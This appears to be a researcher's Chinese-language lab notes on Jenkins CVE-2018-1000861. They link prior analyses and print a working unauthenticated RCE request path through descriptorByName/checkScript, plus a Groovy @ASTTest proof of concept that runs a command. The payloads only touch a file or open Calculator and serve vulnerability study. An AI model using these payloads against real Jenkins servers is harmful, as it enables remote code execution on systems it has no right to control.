绿盟的分析: http://blog.nsfocus.net/jenkins-routing-resolution-and-sandbox-bypass-vulnerability-analysis-report/ 主要将了Jenkins的动态路由机制。
参考: https://www.lucifaer.com/2019/03/04/Jenkins RCE分析(CVE-2018-1000861分析)/ https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/ https://devco.re/blog/2019/02/19/hacking-Jenkins-part2-abusing-meta-programming-for-unauthenticated-RCE/
url编码之后的:
/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x { public x(){"touch /tmp/jenkins_AtWOLi".execute()}}参考: https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2018-1000861
// 这句将req中的字符串转换成Jenkins自己规范的路由 // 比如这里将/jenkins_2_150_3/securityRealm/admin/test/转换成/securityRealm/admin/test/ String servletPath = getServletPath(req);先在终端设置一下classpath:
export CLASSPATH="/Applications/tomcat-8.0.38/webapps/jenkins-2.150.3/WEB-INF/lib/"然后执行poc.groovy。Groovy环境安装参考:https://blog.csdn.net/caiqiiqi/article/details/90450023
import groovy.transform.ASTTest @ASTTest(value={ assert java.lang.Runtime.getRuntime().exec("/Applications/Calculator.app/Contents/MacOS/Calculator") }) class Main { static void main(args){ } }